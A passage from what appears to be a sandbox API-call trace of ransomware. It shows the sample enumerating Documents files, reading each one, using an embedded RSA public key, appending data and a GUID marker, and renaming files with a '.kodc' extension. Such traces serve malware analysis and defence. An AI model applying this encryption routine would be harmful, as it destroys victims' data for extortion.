lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0098.154] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0098.154] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0098.154] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x333a888 [0098.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333a888, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0098.154] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333b018 [0098.154] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0098.154] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0098.154] WriteFile (in: hFile=0x5cc, lpBuffer=0x333b018*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333b018*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0098.154] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0098.154] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0098.154] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0098.154] CloseHandle (hObject=0x5cc) returned 1 [0098.156] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x32c2cb0 [0098.156] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x880) returned 0x32d0db8 [0098.156] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32c2cb0 | out: hHeap=0x630000) returned 1 [0098.156] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cb35uL18.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cb35ul18.ppt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cb35uL18.ppt.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cb35ul18.ppt.kodc")) returned 1 [0098.157] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0098.157] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.157] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.159] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c0 | out: hHeap=0x630000) returned 1 [0098.159] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d69e0e0, ftCreationTime.dwHighDateTime=0x1d5b9a5, ftLastAccessTime.dwLowDateTime=0xe59623d0, ftLastAccessTime.dwHighDateTime=0x1d5b701, ftLastWriteTime.dwLowDateTime=0xe59623d0, ftLastWriteTime.dwHighDateTime=0x1d5b701, nFileSizeHigh=0x0, nFileSizeLow=0x8d81, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CY9Mwns8bf9aS7r7v.xls", cAlternateFileName="CY9MWN~1.XLS")) returned 1 [0098.159] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0098.159] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e) returned 0x65e7c0 [0098.159] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0098.159] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CY9Mwns8bf9aS7r7v.xls") returned=".xls" [0098.159] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CY9Mwns8bf9aS7r7v.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cy9mwns8bf9as7r7v.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0098.159] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=36225) returned 1 [0098.159] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0098.163] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x8d5b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.163] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0098.182] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.182] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.182] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.182] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x8d81, lpOverlapped=0x0) returned 1 [0098.182] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.182] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0098.182] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.182] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.182] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x692d18) returned 1 [0098.183] CryptCreateHash (in: hProv=0x692d18, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0098.183] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0098.183] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0098.183] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0098.183] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0098.183] GetLastError () returned 0x0 [0098.183] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0098.183] CryptReleaseContext (hProv=0x692d18, dwFlags=0x0) returned 1 [0098.183] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.184] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0098.184] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0098.184] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.184] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0098.184] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.184] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.184] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8d80) returned 0x9ba4d90 [0098.184] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0098.184] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.184] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0098.184] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.184] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0098.184] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0098.184] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x32d61f8 [0098.184] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a880 [0098.184] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x32d6048 [0098.184] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a898 [0098.184] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a8c8 [0098.184] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0098.184] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a8e0 [0098.184] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0098.184] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0098.185] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0098.185] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0098.185] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a8c8 | out: hHeap=0x630000) returned 1 [0098.185] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a8e0 | out: hHeap=0x630000) returned 1 [0098.185] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0098.185] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0098.185] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0098.185] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0098.185] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec00 [0098.185] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a8e0 [0098.185] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0098.185] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331a8c8 [0098.185] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec10 [0098.185] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c658 [0098.185] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0098.185] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0098.185] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0098.185] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c770 [0098.185] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0098.185] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0098.185] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0098.185] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a8e0 | out: hHeap=0x630000) returned 1 [0098.185] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.185] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a8c8 | out: hHeap=0x630000) returned 1 [0098.185] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0098.185] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0098.185] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0098.185] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0098.185] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0098.185] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.185] GetCurrentThreadId () returned 0x42c [0098.186] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0098.186] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9b8e5d8 [0098.186] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0098.186] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0098.186] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0098.186] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0098.186] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.186] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0098.186] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.186] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.186] GetCurrentThreadId () returned 0x42c [0098.186] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.186] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.186] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0098.186] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.186] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.186] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.186] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.186] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0098.186] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0098.186] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0098.186] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318ea0 [0098.186] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0098.186] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0098.186] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.186] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0098.186] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.186] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.186] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0098.186] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0098.186] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0098.186] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0098.186] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0098.186] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.187] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a8c8 [0098.187] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0098.187] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0098.187] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.187] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.187] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0098.187] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0098.187] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0098.187] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a8e0 [0098.187] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0098.187] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0098.187] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0098.187] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a8b0 [0098.187] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0098.187] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0098.187] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.187] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0098.187] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0098.187] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0098.187] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0098.187] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a8f8 [0098.187] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0098.187] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a520 [0098.187] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0098.187] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0098.187] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0098.187] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0098.188] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x8d81, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.188] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0098.188] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0098.188] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0098.188] CloseHandle (hObject=0x5cc) returned 1 [0098.190] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0098.190] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x32d0db8 [0098.190] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CY9Mwns8bf9aS7r7v.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cy9mwns8bf9as7r7v.xls"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CY9Mwns8bf9aS7r7v.xls.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cy9mwns8bf9as7r7v.xls.kodc")) returned 1 [0098.192] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ce14870, ftCreationTime.dwHighDateTime=0x1d5be16, ftLastAccessTime.dwLowDateTime=0x9fc8eba0, ftLastAccessTime.dwHighDateTime=0x1d5bd17, ftLastWriteTime.dwLowDateTime=0x9fc8eba0, ftLastWriteTime.dwHighDateTime=0x1d5bd17, nFileSizeHigh=0x0, nFileSizeLow=0xe7e9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="c_UXE8e7CHr2aXm.csv", cAlternateFileName="C_UXE8~1.CSV")) returned 1 [0098.192] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0098.192] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e) returned 0x65e7c0 [0098.192] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\c_UXE8e7CHr2aXm.csv") returned=".csv" [0098.192] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\c_UXE8e7CHr2aXm.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\c_uxe8e7chr2axm.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0098.192] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=59369) returned 1 [0098.192] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0098.196] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xe7c3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.196] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0098.197] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.197] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0xe7e9, lpOverlapped=0x0) returned 1 [0098.197] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.197] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0098.197] lstrlenA (lpString="-----BEGIN PUBLIC 